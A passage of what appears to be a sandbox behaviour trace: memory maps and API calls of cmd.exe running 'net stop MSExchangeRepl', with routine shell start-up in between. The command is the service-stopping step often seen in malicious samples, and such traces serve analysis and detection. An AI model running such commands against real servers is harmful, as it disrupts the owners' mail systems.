end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 11496 start_va = 0x420000 end_va = 0x441ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 11497 start_va = 0x4420000 end_va = 0x443ffff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 11498 start_va = 0x4440000 end_va = 0x4440fff entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 11499 start_va = 0x4450000 end_va = 0x4463fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004450000" filename = "" Region: id = 11500 start_va = 0x4470000 end_va = 0x44affff entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 11501 start_va = 0x44b0000 end_va = 0x45affff entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 11502 start_va = 0x45b0000 end_va = 0x45b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 11503 start_va = 0x45c0000 end_va = 0x45c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 11504 start_va = 0x45d0000 end_va = 0x45d1fff entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 11505 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11506 start_va = 0x7f3a0000 end_va = 0x7f3c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f3a0000" filename = "" Region: id = 11507 start_va = 0x7f3c3000 end_va = 0x7f3c3fff entry_point = 0x0 region_type = private name = "private_0x000000007f3c3000" filename = "" Region: id = 11508 start_va = 0x7f3ca000 end_va = 0x7f3ccfff entry_point = 0x0 region_type = private name = "private_0x000000007f3ca000" filename = "" Region: id = 11509 start_va = 0x7f3cd000 end_va = 0x7f3cdfff entry_point = 0x0 region_type = private name = "private_0x000000007f3cd000" filename = "" Region: id = 11510 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11511 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11512 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11513 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11514 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11515 start_va = 0x45e0000 end_va = 0x45effff entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 11516 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11517 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11518 start_va = 0x4710000 end_va = 0x480ffff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 11519 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11560 start_va = 0x4420000 end_va = 0x442ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004420000" filename = "" Region: id = 11561 start_va = 0x45f0000 end_va = 0x46adfff entry_point = 0x45f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11562 start_va = 0x46b0000 end_va = 0x46effff entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 11563 start_va = 0x4810000 end_va = 0x490ffff entry_point = 0x0 region_type = private name = "private_0x0000000004810000" filename = "" Region: id = 11564 start_va = 0x4a80000 end_va = 0x4a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 11565 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11566 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11567 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11568 start_va = 0x7f2a0000 end_va = 0x7f39ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f2a0000" filename = "" Region: id = 11569 start_va = 0x7f3c7000 end_va = 0x7f3c9fff entry_point = 0x0 region_type = private name = "private_0x000000007f3c7000" filename = "" Region: id = 11570 start_va = 0x4430000 end_va = 0x4433fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 11571 start_va = 0x4440000 end_va = 0x4443fff entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 11572 start_va = 0x4a90000 end_va = 0x4dc6fff entry_point = 0x4a90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 704 os_tid = 0xc38 [0139.185] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0139.185] __set_app_type (_Type=0x1) [0139.185] __p__fmode () returned 0x77ac4d6c [0139.185] __p__commode () returned 0x77ac5b1c [0139.185] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0139.185] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0139.185] GetCurrentThreadId () returned 0xc38 [0139.185] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc38) returned 0x84 [0139.185] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0139.185] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0139.186] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.188] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.188] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x45af7b4 | out: phkResult=0x45af7b4*=0x0) returned 0x2 [0139.188] VirtualQuery (in: lpAddress=0x45af7bb, lpBuffer=0x45af76c, dwLength=0x1c | out: lpBuffer=0x45af76c*(BaseAddress=0x45af000, AllocationBase=0x44b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.188] VirtualQuery (in: lpAddress=0x44b0000, lpBuffer=0x45af76c, dwLength=0x1c | out: lpBuffer=0x45af76c*(BaseAddress=0x44b0000, AllocationBase=0x44b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0139.188] VirtualQuery (in: lpAddress=0x44b1000, lpBuffer=0x45af76c, dwLength=0x1c | out: lpBuffer=0x45af76c*(BaseAddress=0x44b1000, AllocationBase=0x44b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0139.188] VirtualQuery (in: lpAddress=0x44b3000, lpBuffer=0x45af76c, dwLength=0x1c | out: lpBuffer=0x45af76c*(BaseAddress=0x44b3000, AllocationBase=0x44b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.188] VirtualQuery (in: lpAddress=0x45b0000, lpBuffer=0x45af76c, dwLength=0x1c | out: lpBuffer=0x45af76c*(BaseAddress=0x45b0000, AllocationBase=0x45b0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0139.188] GetConsoleOutputCP () returned 0x1b5 [0139.188] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0139.188] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0139.189] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.189] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0139.189] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.189] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0139.189] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.189] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0139.189] _get_osfhandle (_FileHandle=0) returned 0x38 [0139.189] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0139.189] _get_osfhandle (_FileHandle=0) returned 0x38 [0139.189] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0139.189] GetEnvironmentStringsW () returned 0x4717d68* [0139.190] FreeEnvironmentStringsA (penv="A") returned 1 [0139.190] GetEnvironmentStringsW () returned 0x4717d68* [0139.190] FreeEnvironmentStringsA (penv="A") returned 1 [0139.190] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x45ae718 | out: phkResult=0x45ae718*=0x94) returned 0x0 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x0, lpData=0x45ae724*=0x11, lpcbData=0x45ae720*=0x1000) returned 0x2 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x4, lpData=0x45ae724*=0x1, lpcbData=0x45ae720*=0x4) returned 0x0 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x0, lpData=0x45ae724*=0x1, lpcbData=0x45ae720*=0x1000) returned 0x2 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x4, lpData=0x45ae724*=0x0, lpcbData=0x45ae720*=0x4) returned 0x0 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x4, lpData=0x45ae724*=0x40, lpcbData=0x45ae720*=0x4) returned 0x0 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x4, lpData=0x45ae724*=0x40, lpcbData=0x45ae720*=0x4) returned 0x0 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x0, lpData=0x45ae724*=0x40, lpcbData=0x45ae720*=0x1000) returned 0x2 [0139.190] RegCloseKey (hKey=0x94) returned 0x0 [0139.190] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x45ae718 | out: phkResult=0x45ae718*=0x94) returned 0x0 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x0, lpData=0x45ae724*=0x40, lpcbData=0x45ae720*=0x1000) returned 0x2 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x4, lpData=0x45ae724*=0x1, lpcbData=0x45ae720*=0x4) returned 0x0 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x0, lpData=0x45ae724*=0x1, lpcbData=0x45ae720*=0x1000) returned 0x2 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x4, lpData=0x45ae724*=0x0, lpcbData=0x45ae720*=0x4) returned 0x0 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x4, lpData=0x45ae724*=0x9, lpcbData=0x45ae720*=0x4) returned 0x0 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x4, lpData=0x45ae724*=0x9, lpcbData=0x45ae720*=0x4) returned 0x0 [0139.190] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x45ae71c, lpData=0x45ae724, lpcbData=0x45ae720*=0x1000 | out: lpType=0x45ae71c*=0x0, lpData=0x45ae724*=0x9, lpcbData=0x45ae720*=0x1000) returned 0x2 [0139.190] RegCloseKey (hKey=0x94) returned 0x0 [0139.190] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2983c [0139.190] srand (_Seed=0x5ad2983c) [0139.190] GetCommandLineW () returned="/c net stop MSExchangeRepl" [0139.190] GetCommandLineW () returned="/c net stop MSExchangeRepl" [0139.190] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0139.191] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4719cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0139.191] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0139.191] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.191] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.191] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.191] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.191] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.191] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.191] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.191] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.191] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.191] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.191] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.191] GetEnvironmentStringsW () returned 0x4717d68* [0139.191] FreeEnvironmentStringsA (penv="A") returned 1 [0139.191] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.191] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.191] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.191] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.191] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.191] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.191] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.191] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.191] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.191] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.191] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x45af4f0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0139.192] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x45af4f0, lpFilePart=0x45af4e8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x45af4e8*="Desktop") returned 0x1d [0139.192] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0139.192] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x45af270 | out: lpFindFileData=0x45af270) returned 0x47105c8 [0139.192] FindClose (in: hFindFile=0x47105c8 | out: hFindFile=0x47105c8) returned 1 [0139.192] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x45af270 | out: lpFindFileData=0x45af270) returned 0x47105c8 [0139.192] FindClose (in: hFindFile=0x47105c8 | out: hFindFile=0x47105c8) returned 1 [0139.192] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0139.192] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x45af270 | out: lpFindFileData=0x45af270) returned 0x47105c8 [0139.192] FindClose (in: hFindFile=0x47105c8 | out: hFindFile=0x47105c8) returned 1 [0139.192] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0139.192] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0139.192] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0139.192] GetEnvironmentStringsW () returned 0x4717d68* [0139.192] FreeEnvironmentStringsA (penv="=") returned 1 [0139.192] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0139.193] GetConsoleOutputCP () returned 0x1b5 [0139.193] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0139.193] GetUserDefaultLCID () returned 0x409 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x45af620, cchData=128 | out: lpLCData="0") returned 2 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x45af620, cchData=128 | out: lpLCData="0") returned 2 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x45af620, cchData=128 | out: lpLCData="1") returned 2 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0139.193] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0139.193] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.194] GetConsoleTitleW (in: lpConsoleTitle=0x471a9e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.194] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0139.194] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0139.194] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0139.194] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0139.195] _wcsicmp (_String1="net", _String2=")") returned 69 [0139.195] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0139.195] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0139.195] _wcsicmp (_String1="IF", _String2="net") returned -5 [0139.195] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0139.195] _wcsicmp (_String1="REM", _String2="net") returned 4 [0139.195] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0139.196] GetConsoleTitleW (in: lpConsoleTitle=0x45af308, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.196] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0139.196] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0139.196] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0139.196] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0139.196] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0139.196] _wcsicmp (_String1="net", _String2="CD") returned 11 [0139.196] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0139.196] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0139.196] _wcsicmp (_String1="net", _String2="REN") returned -4 [0139.196] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0139.196] _wcsicmp (_String1="net", _String2="SET") returned -5 [0139.196] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0139.196] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0139.196] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0139.196] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0139.196] _wcsicmp (_String1="net", _String2="MD") returned 1 [0139.196] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0139.196] _wcsicmp (_String1="net", _String2="RD") returned -4 [0139.196] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0139.196] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0139.196] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0139.196] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0139.196] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0139.196] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0139.196] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0139.196] _wcsicmp (_String1="net", _String2="VER") returned -8 [0139.196] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0139.196] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0139.196] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0139.196] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0139.196] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0139.197] _wcsicmp (_String1="net", _String2="START") returned -5 [0139.197] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0139.197] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0139.197] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0139.197] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0139.197] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0139.197] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0139.197] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0139.197] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0139.197] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0139.197] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0139.197] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0139.197] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0139.197] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0139.197] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0139.197] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0139.197] _wcsicmp (_String1="net", _String2="CD") returned 11 [0139.197] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0139.197] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0139.197] _wcsicmp (_String1="net", _String2="REN") returned -4 [0139.197] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0139.197] _wcsicmp (_String1="net", _String2="SET") returned -5 [0139.197] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0139.197] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0139.197] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0139.197] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0139.197] _wcsicmp (_String1="net", _String2="MD") returned 1 [0139.197] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0139.197] _wcsicmp (_String1="net", _String2="RD") returned -4 [0139.197] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0139.197] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0139.197] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0139.197] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0139.197] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0139.197] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0139.197] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0139.197] _wcsicmp (_String1="net", _String2="VER") returned -8 [0139.197] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0139.197] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0139.197] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0139.197] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0139.197] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0139.197] _wcsicmp (_String1="net", _String2="START") returned -5 [0139.197] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0139.197] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0139.197] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0139.197] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0139.197] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0139.197] 